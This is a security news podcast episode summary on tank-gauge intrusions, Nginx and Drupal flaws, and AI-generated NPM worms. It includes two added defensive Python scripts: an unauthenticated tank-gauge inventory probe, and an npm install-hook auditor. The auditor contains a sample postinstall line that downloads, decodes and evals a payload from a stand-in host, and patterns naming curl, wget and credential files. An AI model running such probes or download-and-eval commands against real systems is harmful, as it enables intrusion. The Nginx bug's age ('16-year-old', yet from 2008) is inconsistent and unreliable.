My Mother the Car, AI Slop, Nginx, Polyscope, Drupal, GitHub, Aaran Leyland... - SWN #582
A modern car is no longer just a vehicle; it is a data-harvesting computer on wheels, and that is only one of the alarming trends covered in this week's Security Weekly News. The episode opens with a stark warning: if you expose any system to the internet, even obscure industrial control systems like the automatic tank gauges used at gas stations, attackers will find it, this time Iran. These gauges are often unpatched and have no password set, and they are now exposed to remote code execution, which could be used to overfill tanks or disable safety alarms. The episode then works through a cascade of critical vulnerabilities: a buffer overflow in Nginx dating back to 2008, a critical flaw in Universal Robots' PolyScope OS, and an imminent Drupal security update that is likely to be exploited within hours of release. The larger theme is a new era of AI-assisted attacks: popular NPM packages such as 'Chalk' and 'Tempalette' are being poisoned with AI-generated code that spreads through developer ecosystems like a digital vampire. These 'vibe-coded' attacks, published by a group calling itself Team PCP, are not subtle or obfuscated, and the code is now open source, inviting copycats to join in. Meanwhile, bug bounty programs are drowning in low-quality AI-generated reports, pushing projects like curl to suspend theirs. The takeaway: the attack surface is expanding faster than ever, and the tools to exploit it are available to anyone with a GitHub account and a free AI model.
Iran accessed unsecured automatic tank gauges at U.S. gas stations through unpatched Veeder-Root TLS-350 and TLS-450PLUS systems, risking physical overfilling and disabled safety alarms.
A 16-year-old buffer overflow vulnerability in Nginx (since 2008) has been exploited in the wild—patch immediately to 1.30 or 1.31.
Team PCP released open-source, AI-generated malware on NPM that spreads via 'vampire worm' tactics, poisoning every package a developer maintains.
Bug bounty programs are being overwhelmed by low-quality AI-generated reports, with Curl suspending its program due to the flood of 'AI slop'.
Your car, robot, thermostat, and even your developer's laptop are now high-value attack surfaces—monitor access, credentials, and AI usage.
Opening: The Car, the Chaos, and the Chaos of AI
Doug White opens the episode with a mix of humor and urgency, introducing the week's topics: Iran's access to U.S. gas station tank gauges, AI-generated malware, and the growing danger of unpatched systems.
Iran Targets Unsecured Tank Gauges
“They could manipulate this to cause overfilling. So they basically say the tank is empty in order to refill. And then, you know, somebody comes and starts pumping fuel into the tank and it overflows.”
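The exposure described here is something a defender can verify from their own side. The Python below is an added example, not code from the episode or from Veeder-Root: it frames the TLS-350-family in-tank inventory query (command `I20100`, sent as SOH plus the command code to the gauge's serial-over-TCP service, TCP/10001 by default, as documented in public research on these gauges) and parses the inventory report the gauge returns, so you can confirm whether a gauge on your network answers without any password. The sample response is constructed for the example; the port default and the `probe()` target are assumptions to adapt to your own fleet.

```python
"""Check whether an automatic tank gauge (ATG) answers unauthenticated
serial-over-TCP queries, and parse the in-tank inventory it returns.

Added example (not from the episode or from Veeder-Root). Assumptions:
TLS-350-family gauges expose their serial console on TCP/10001 and accept
commands framed as SOH (0x01) + command code, answering with a text report
terminated by ETX (0x03); `I20100` is the in-tank inventory report.
SAMPLE_RESPONSE below is constructed, not captured from a real gauge.
"""
import re
import socket
from dataclasses import dataclass

SOH, ETX = b"\x01", b"\x03"
ATG_PORT = 10001            # assumed default serial-over-TCP port
INVENTORY_CMD = b"I20100"   # in-tank inventory report (read-only)


@dataclass
class Tank:
    number: int
    product: str
    volume: int
    tc_volume: int
    ullage: int
    height: float
    water: float
    temp: float


def build_command(code: bytes) -> bytes:
    """Frame a TLS-350 command: SOH + code, no newline and no credential."""
    return SOH + code


# One inventory row: tank no., product name, three integer volumes, three decimals.
_ROW = re.compile(
    r"^\s*(\d+)\s+(.+?)\s+(\d+)\s+(\d+)\s+(\d+)\s+([\d.]+)\s+([\d.]+)\s+([\d.]+)\s*$"
)


def parse_inventory(report: bytes) -> list[Tank]:
    """Parse the tabular section of an I20100 response into Tank records."""
    text = report.decode("ascii", errors="replace").strip("\x01\x03\r\n ")
    tanks = []
    for line in text.splitlines():
        m = _ROW.match(line)
        if m:  # header, date and station lines do not start with a digit
            tanks.append(Tank(int(m[1]), m[2].strip(), int(m[3]), int(m[4]),
                              int(m[5]), float(m[6]), float(m[7]), float(m[8])))
    return tanks


def is_exposed(report: bytes) -> bool:
    """A gauge that hands back an inventory table to an unauthenticated
    I20100 is reachable with no password at all: treat it as exposed."""
    return b"IN-TANK INVENTORY" in report and len(parse_inventory(report)) > 0


def probe(host: str, port: int = ATG_PORT, timeout: float = 5.0) -> bytes:
    """Send the inventory query and read until ETX or timeout.
    Only run against gauges you own or are authorized to test."""
    buf = b""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_command(INVENTORY_CMD))
        try:
            while ETX not in buf:
                chunk = s.recv(4096)
                if not chunk:
                    break
                buf += chunk
        except socket.timeout:
            pass
    return buf


# Constructed sample of what an unauthenticated gauge returns.
SAMPLE_RESPONSE = (
    b"\x01I20100\r\nMAY 20, 2026  9:14 AM\r\n\r\nEXAMPLE STATION\r\n\r\n"
    b"IN-TANK INVENTORY\r\n\r\n"
    b"TANK PRODUCT             VOLUME TC VOLUME   ULLAGE   HEIGHT    WATER     TEMP\r\n"
    b"  1  UNLEADED              5123      5098     4877    45.22     0.00    62.41\r\n"
    b"  2  PREMIUM               2210      2201     7790    22.07     0.31    61.98\r\n"
    b"  3  DIESEL                6840      6811     3160    58.90     0.00    60.02\r\n\x03"
)

if __name__ == "__main__":
    for t in parse_inventory(SAMPLE_RESPONSE):
        print(t)
    print("exposed:", is_exposed(SAMPLE_RESPONSE))
```

Run `probe()` only against gauges you are authorized to test. A gauge that answers this read-only query with no credential is reachable by anyone who can reach the port, so it belongs behind a VPN or an authenticating gateway with TCP/10001 blocked at the perimeter, not on a public address.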
Nginx Buffer Overflow: A 16-Year-Old Vulnerability Exploited
“The vulnerability can be caused because of an address space layout randomization feature. If you have that disabled, it apparently can lead to remote code execution.”
AI-Generated Malware on NPM: The 'Vibe-Coded' Threat
“One kid, vibe coding with an NPM publish token, info stealers in an afternoon. Hey, good work. Somebody should, like, maybe hire that person.”
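What lets the 'vampire worm' pattern spread is that npm runs package lifecycle scripts at install time, so one poisoned release executes on every developer machine and CI runner that pulls it. The Python below is an added example, not the episode's code and not any named project's: it walks a node_modules tree, flags every package that declares preinstall/install/postinstall hooks, and highlights script bodies carrying download-and-execute or encoded-payload markers. The manifests are constructed for the example; the marker patterns are general heuristics, not signatures for Team PCP's code, which the page does not show.

```python
"""Audit an npm dependency tree for install-time code execution.

Added example, not from the episode or from any named project. npm runs
the preinstall/install/postinstall (and prepare) scripts of every package
during `npm install`, which is how a worm that poisons a maintainer's
packages gets its code executed downstream. This walks node_modules,
reports each package declaring such hooks, and tags script bodies that
fetch from the network, eval inline code, decode a payload or touch
credential files. CLEAN_PKG and POISONED_PKG are constructed manifests;
the SUSPICIOUS patterns are heuristics, not malware signatures.
"""
import json
import re
from pathlib import Path

LIFECYCLE = ("preinstall", "install", "postinstall", "preprepare", "prepare")

# Heuristic markers of download-and-run or hidden payloads in a hook body.
SUSPICIOUS = {
    "network fetch": re.compile(r"\b(curl|wget|fetch\(|https?://)", re.I),
    "inline node eval": re.compile(r"\bnode\s+-e\b|\beval\(|new Function\(", re.I),
    "encoded payload": re.compile(
        r"base64|atob\(|Buffer\.from\([^)]*,\s*['\"](base64|hex)['\"]", re.I),
    "credential paths": re.compile(r"\.npmrc|\.ssh/|\.aws/|\.gitconfig|process\.env", re.I),
}


def audit_manifest(pkg: dict) -> list[str]:
    """Return findings for one parsed package.json (empty list = nothing to flag)."""
    findings = []
    scripts = pkg.get("scripts") or {}
    for hook in LIFECYCLE:
        body = scripts.get(hook)
        if not body:
            continue
        findings.append(f"lifecycle script '{hook}': {body}")
        for label, rx in SUSPICIOUS.items():
            if rx.search(body):
                findings.append(f"  {label} in '{hook}'")
    return findings


def audit_tree(node_modules: Path) -> dict[str, list[str]]:
    """Audit every package.json under node_modules, including scoped and
    nested packages; keyed by name@version, only packages with findings."""
    results = {}
    for manifest in node_modules.rglob("package.json"):
        try:
            pkg = json.loads(manifest.read_text(encoding="utf-8"))
        except (OSError, json.JSONDecodeError):
            continue
        findings = audit_manifest(pkg)
        if findings:
            key = f"{pkg.get('name', manifest.parent.name)}@{pkg.get('version', '?')}"
            results[key] = findings
    return results


# Constructed sample manifests (hypothetical package names).
CLEAN_PKG = {"name": "left-pad-like", "version": "1.0.0",
             "scripts": {"test": "node test.js"}}
POISONED_PKG = {
    "name": "colorful-strings", "version": "5.3.1",
    "scripts": {
        # A one-liner that downloads, base64-decodes and evals a payload.
        "postinstall": ("node -e \"require('https').get('https://example.invalid/x',"
                        "r=>{let d='';r.on('data',c=>d+=c);"
                        "r.on('end',()=>eval(Buffer.from(d,'base64').toString()))})\""),
    },
}

if __name__ == "__main__":
    for finding in audit_manifest(POISONED_PKG):
        print(finding)
    for name, items in audit_tree(Path("node_modules")).items():
        print(name, *items, sep="\n  ")
```

Pair this with `ignore-scripts=true` in `.npmrc` so installs never run hooks unless you opt in per package, and rotate any npm publish token that has ever sat in a repository, a CI log or a developer's shell history; the worm the show describes needs exactly that token to poison the rest of a maintainer's packages.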
Drupal’s Urgent Patch: A Domino Effect of Risk
Drupal is releasing a critical security update on May 20th. Users must be ready to patch as soon as it lands, since exploitation is expected within hours of release; sites still on end-of-life versions will not receive the fix and need to move to a supported release first.
“Bugcrowd said their reports had quadrupled over three weeks in March, with most of the reports being really low quality and false.”
Mentioned in this episode: Nginx (F5), GitHub, NPM, Drupal, Team PCP, PolyScope, GitGuardian, Iran, Aaran Leyland.
